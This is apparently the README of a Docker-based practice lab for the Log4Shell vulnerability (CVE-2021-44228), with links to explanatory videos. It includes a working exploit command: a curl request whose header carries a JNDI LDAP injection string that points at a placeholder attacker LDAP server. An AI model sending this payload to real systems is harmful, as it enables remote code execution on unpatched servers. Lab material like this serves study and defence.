CVE-2021-44228# log4shell exploit lab
This repository is a single-line setup for log4shell exploit lab.
Setup the lab: `docker-compose up -d`
Run exploit: `curl -X GET http://localhost:8080/ -H "X-Api-Version: ${jndi:ldap://my_ldap_server:1389/a}"`
Then go to `vul` container and see that indeed we pwned the machine:

* Video explaining the lab setup: https://www.youtube.com/watch?v=WBzR30JcT5g)
* Video explaining the code: https://www.youtube.com/watch?v=oRvp0c-fa1o
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view